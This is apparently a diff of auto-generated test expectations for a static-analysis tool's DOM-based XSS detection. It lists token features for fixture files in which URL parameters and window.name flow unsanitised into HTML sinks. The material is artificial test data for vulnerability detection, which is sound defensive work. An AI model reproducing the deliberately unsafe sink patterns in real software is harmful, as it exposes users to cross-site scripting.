autogenerated/Xss/DomBasedXss/translate.js:9:27:9:50 | exceptional return of searchP ... 'term') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/translate.js:9:27:9:50 | exceptional return of searchP ... 'term') | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ translated-term html translate searchParams get term | +| autogenerated/Xss/DomBasedXss/translate.js:9:27:9:50 | exceptional return of searchP ... 'term') | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/translate.js:9:27:9:50 | exceptional return of searchP ... 'term') | fileImports | | | autogenerated/Xss/DomBasedXss/translate.js:9:27:9:50 | searchP ... 'term') | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/translate.js:9:27:9:50 | searchP ... 'term') | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/translate.js:9:27:9:50 | searchP ... 'term') | contextFunctionInterfaces | | @@ -15613,6 +110581,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/translate.js:9:27:9:50 | searchP ... 'term') | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ translated-term html translate searchParams get term | | autogenerated/Xss/DomBasedXss/translate.js:9:27:9:50 | searchP ... 'term') | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/translate.js:9:27:9:50 | searchP ... 'term') | fileImports | | +| autogenerated/Xss/DomBasedXss/translate.js:9:40:9:42 | get | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/translate.js:9:40:9:42 | get | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/translate.js:9:40:9:42 | get | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ translated-term html translate searchParams get term | +| autogenerated/Xss/DomBasedXss/translate.js:9:40:9:42 | get | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/translate.js:9:40:9:42 | get | fileImports | | | autogenerated/Xss/DomBasedXss/translate.js:9:44:9:49 | 'term' | CalleeFlexibleAccessPath | searchParams.get | | autogenerated/Xss/DomBasedXss/translate.js:9:44:9:49 | 'term' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/translate.js:9:44:9:49 | 'term' | contextFunctionInterfaces | | @@ -15621,6 +110594,36 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/translate.js:9:44:9:49 | 'term' | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/translate.js:9:44:9:49 | 'term' | fileImports | | | autogenerated/Xss/DomBasedXss/translate.js:9:44:9:49 | 'term' | receiverName | searchParams | +| autogenerated/Xss/DomBasedXss/translate.js:11:3:11:3 | $ | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/translate.js:11:3:11:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/translate.js:11:3:11:3 | $ | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ translated-term html translate searchParams get term | +| autogenerated/Xss/DomBasedXss/translate.js:11:3:11:3 | $ | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/translate.js:11:3:11:3 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/translate.js:11:3:11:22 | $('translated-term') | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/translate.js:11:3:11:22 | $('translated-term') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/translate.js:11:3:11:22 | $('translated-term') | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ translated-term html translate searchParams get term | +| autogenerated/Xss/DomBasedXss/translate.js:11:3:11:22 | $('translated-term') | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/translate.js:11:3:11:22 | $('translated-term') | fileImports | | +| autogenerated/Xss/DomBasedXss/translate.js:11:3:11:22 | exceptional return of $('translated-term') | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/translate.js:11:3:11:22 | exceptional return of $('translated-term') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/translate.js:11:3:11:22 | exceptional return of $('translated-term') | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ translated-term html translate searchParams get term | +| autogenerated/Xss/DomBasedXss/translate.js:11:3:11:22 | exceptional return of $('translated-term') | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/translate.js:11:3:11:22 | exceptional return of $('translated-term') | fileImports | | +| autogenerated/Xss/DomBasedXss/translate.js:11:3:11:27 | $('tran ... ').html | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/translate.js:11:3:11:27 | $('tran ... ').html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/translate.js:11:3:11:27 | $('tran ... ').html | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ translated-term html translate searchParams get term | +| autogenerated/Xss/DomBasedXss/translate.js:11:3:11:27 | $('tran ... ').html | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/translate.js:11:3:11:27 | $('tran ... ').html | fileImports | | +| autogenerated/Xss/DomBasedXss/translate.js:11:3:11:64 | $('tran ... erm')]) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/translate.js:11:3:11:64 | $('tran ... erm')]) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/translate.js:11:3:11:64 | $('tran ... erm')]) | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ translated-term html translate searchParams get term | +| autogenerated/Xss/DomBasedXss/translate.js:11:3:11:64 | $('tran ... erm')]) | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/translate.js:11:3:11:64 | $('tran ... erm')]) | fileImports | | +| autogenerated/Xss/DomBasedXss/translate.js:11:3:11:64 | exceptional return of $('tran ... erm')]) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/translate.js:11:3:11:64 | exceptional return of $('tran ... erm')]) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/translate.js:11:3:11:64 | exceptional return of $('tran ... erm')]) | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ translated-term html translate searchParams get term | +| autogenerated/Xss/DomBasedXss/translate.js:11:3:11:64 | exceptional return of $('tran ... erm')]) | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/translate.js:11:3:11:64 | exceptional return of $('tran ... erm')]) | fileImports | | | autogenerated/Xss/DomBasedXss/translate.js:11:5:11:21 | 'translated-term' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/translate.js:11:5:11:21 | 'translated-term' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/translate.js:11:5:11:21 | 'translated-term' | contextFunctionInterfaces | | @@ -15628,6 +110631,16 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/translate.js:11:5:11:21 | 'translated-term' | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ translated-term html translate searchParams get term | | autogenerated/Xss/DomBasedXss/translate.js:11:5:11:21 | 'translated-term' | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/translate.js:11:5:11:21 | 'translated-term' | fileImports | | +| autogenerated/Xss/DomBasedXss/translate.js:11:24:11:27 | html | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/translate.js:11:24:11:27 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/translate.js:11:24:11:27 | html | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ translated-term html translate searchParams get term | +| autogenerated/Xss/DomBasedXss/translate.js:11:24:11:27 | html | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/translate.js:11:24:11:27 | html | fileImports | | +| autogenerated/Xss/DomBasedXss/translate.js:11:29:11:37 | translate | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/translate.js:11:29:11:37 | translate | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/translate.js:11:29:11:37 | translate | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ translated-term html translate searchParams get term | +| autogenerated/Xss/DomBasedXss/translate.js:11:29:11:37 | translate | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/translate.js:11:29:11:37 | translate | fileImports | | | autogenerated/Xss/DomBasedXss/translate.js:11:29:11:63 | transla ... term')] | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/translate.js:11:29:11:63 | transla ... term')] | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/translate.js:11:29:11:63 | transla ... term')] | contextFunctionInterfaces | | @@ -15635,6 +110648,31 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/translate.js:11:29:11:63 | transla ... term')] | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ translated-term html translate searchParams get term | | autogenerated/Xss/DomBasedXss/translate.js:11:29:11:63 | transla ... term')] | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/translate.js:11:29:11:63 | transla ... term')] | fileImports | | +| autogenerated/Xss/DomBasedXss/translate.js:11:39:11:50 | searchParams | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/translate.js:11:39:11:50 | searchParams | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/translate.js:11:39:11:50 | searchParams | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ translated-term html translate searchParams get term | +| autogenerated/Xss/DomBasedXss/translate.js:11:39:11:50 | searchParams | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/translate.js:11:39:11:50 | searchParams | fileImports | | +| autogenerated/Xss/DomBasedXss/translate.js:11:39:11:54 | searchParams.get | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/translate.js:11:39:11:54 | searchParams.get | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/translate.js:11:39:11:54 | searchParams.get | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ translated-term html translate searchParams get term | +| autogenerated/Xss/DomBasedXss/translate.js:11:39:11:54 | searchParams.get | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/translate.js:11:39:11:54 | searchParams.get | fileImports | | +| autogenerated/Xss/DomBasedXss/translate.js:11:39:11:62 | exceptional return of searchP ... 'term') | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/translate.js:11:39:11:62 | exceptional return of searchP ... 'term') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/translate.js:11:39:11:62 | exceptional return of searchP ... 'term') | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ translated-term html translate searchParams get term | +| autogenerated/Xss/DomBasedXss/translate.js:11:39:11:62 | exceptional return of searchP ... 'term') | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/translate.js:11:39:11:62 | exceptional return of searchP ... 'term') | fileImports | | +| autogenerated/Xss/DomBasedXss/translate.js:11:39:11:62 | searchP ... 'term') | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/translate.js:11:39:11:62 | searchP ... 'term') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/translate.js:11:39:11:62 | searchP ... 'term') | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ translated-term html translate searchParams get term | +| autogenerated/Xss/DomBasedXss/translate.js:11:39:11:62 | searchP ... 'term') | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/translate.js:11:39:11:62 | searchP ... 'term') | fileImports | | +| autogenerated/Xss/DomBasedXss/translate.js:11:52:11:54 | get | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/translate.js:11:52:11:54 | get | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/translate.js:11:52:11:54 | get | enclosingFunctionBody | translate own goal backpass fumble feint target document location search searchParams URLSearchParams target substring 1 $ original-term html searchParams get term $ translated-term html translate searchParams get term | +| autogenerated/Xss/DomBasedXss/translate.js:11:52:11:54 | get | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/translate.js:11:52:11:54 | get | fileImports | | | autogenerated/Xss/DomBasedXss/translate.js:11:56:11:61 | 'term' | CalleeFlexibleAccessPath | searchParams.get | | autogenerated/Xss/DomBasedXss/translate.js:11:56:11:61 | 'term' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/translate.js:11:56:11:61 | 'term' | contextFunctionInterfaces | | @@ -15643,6 +110681,81 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/translate.js:11:56:11:61 | 'term' | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/translate.js:11:56:11:61 | 'term' | fileImports | | | autogenerated/Xss/DomBasedXss/translate.js:11:56:11:61 | 'term' | receiverName | searchParams | +| autogenerated/Xss/DomBasedXss/trusted-types.js:1:1:1:0 | this | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:1:1:1:0 | this | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:1:1:10:2 | (functi ... e');\\n}) | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:1:1:10:2 | (functi ... e');\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:1:1:10:2 | (functi ... e');\\n}) | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:1:1:10:4 | (functi ... );\\n})() | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:1:1:10:4 | (functi ... );\\n})() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:1:1:10:4 | (functi ... );\\n})() | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:1:1:10:4 | exceptional return of (functi ... );\\n})() | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:1:1:10:4 | exceptional return of (functi ... );\\n})() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:1:1:10:4 | exceptional return of (functi ... );\\n})() | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:1:2:1:1 | this | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:1:2:1:1 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:1:2:1:1 | this | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:1:2:1:1 | this | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:1:2:1:1 | this | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:1:2:10:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:1:2:10:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:1:2:10:1 | 'arguments' object of anonymous function | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:1:2:10:1 | 'arguments' object of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:1:2:10:1 | 'arguments' object of anonymous function | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:1:2:10:1 | exceptional return of anonymous function | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:1:2:10:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:1:2:10:1 | exceptional return of anonymous function | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:1:2:10:1 | exceptional return of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:1:2:10:1 | exceptional return of anonymous function | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:1:2:10:1 | functio ... fe');\\n} | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:1:2:10:1 | functio ... fe');\\n} | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/trusted-types.js:1:2:10:1 | functio ... fe');\\n} | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:1:2:10:1 | return of anonymous function | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:1:2:10:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:1:2:10:1 | return of anonymous function | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:1:2:10:1 | return of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:1:2:10:1 | return of anonymous function | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:11:2:17 | policy1 | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:11:2:17 | policy1 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:11:2:17 | policy1 | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:11:2:17 | policy1 | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:11:2:17 | policy1 | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:11:2:74 | policy1 | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:11:2:74 | policy1 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:11:2:74 | policy1 | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:11:2:74 | policy1 | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:11:2:74 | policy1 | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:11:2:74 | policy1 ... => x }) | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:11:2:74 | policy1 ... => x }) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:11:2:74 | policy1 ... => x }) | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:11:2:74 | policy1 ... => x }) | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:11:2:74 | policy1 ... => x }) | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:21:2:32 | trustedTypes | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:21:2:32 | trustedTypes | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:21:2:32 | trustedTypes | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:21:2:32 | trustedTypes | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:21:2:32 | trustedTypes | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:21:2:45 | trusted ... ePolicy | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:21:2:45 | trusted ... ePolicy | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:21:2:45 | trusted ... ePolicy | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:21:2:45 | trusted ... ePolicy | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:21:2:45 | trusted ... ePolicy | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:21:2:74 | exceptional return of trusted ... => x }) | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:21:2:74 | exceptional return of trusted ... => x }) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:21:2:74 | exceptional return of trusted ... => x }) | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:21:2:74 | exceptional return of trusted ... => x }) | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:21:2:74 | exceptional return of trusted ... => x }) | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:21:2:74 | trusted ... => x }) | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:21:2:74 | trusted ... => x }) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:21:2:74 | trusted ... => x }) | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:21:2:74 | trusted ... => x }) | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:21:2:74 | trusted ... => x }) | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:34:2:45 | createPolicy | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:34:2:45 | createPolicy | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:34:2:45 | createPolicy | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:34:2:45 | createPolicy | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:34:2:45 | createPolicy | fileImports | | | autogenerated/Xss/DomBasedXss/trusted-types.js:2:47:2:49 | 'x' | CalleeFlexibleAccessPath | trustedTypes.createPolicy | | autogenerated/Xss/DomBasedXss/trusted-types.js:2:47:2:49 | 'x' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/trusted-types.js:2:47:2:49 | 'x' | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | @@ -15659,6 +110772,46 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/trusted-types.js:2:52:2:73 | { creat ... => x } | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/trusted-types.js:2:52:2:73 | { creat ... => x } | fileImports | | | autogenerated/Xss/DomBasedXss/trusted-types.js:2:52:2:73 | { creat ... => x } | receiverName | trustedTypes | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:54:2:63 | createHTML | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:54:2:63 | createHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:54:2:63 | createHTML | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:54:2:63 | createHTML | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:54:2:63 | createHTML | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:54:2:71 | createHTML: x => x | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:54:2:71 | createHTML: x => x | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:54:2:71 | createHTML: x => x | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:54:2:71 | createHTML: x => x | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:54:2:71 | createHTML: x => x | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:54:2:71 | createHTML: x => x | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:54:2:71 | createHTML: x => x | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:54:2:71 | createHTML: x => x | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:54:2:71 | createHTML: x => x | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:54:2:71 | createHTML: x => x | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:66:2:66 | x | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:66:2:66 | x | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:66:2:66 | x | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:66:2:66 | x | contextSurroundingFunctionParameters | ()\n(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:66:2:66 | x | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:66:2:66 | x | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes 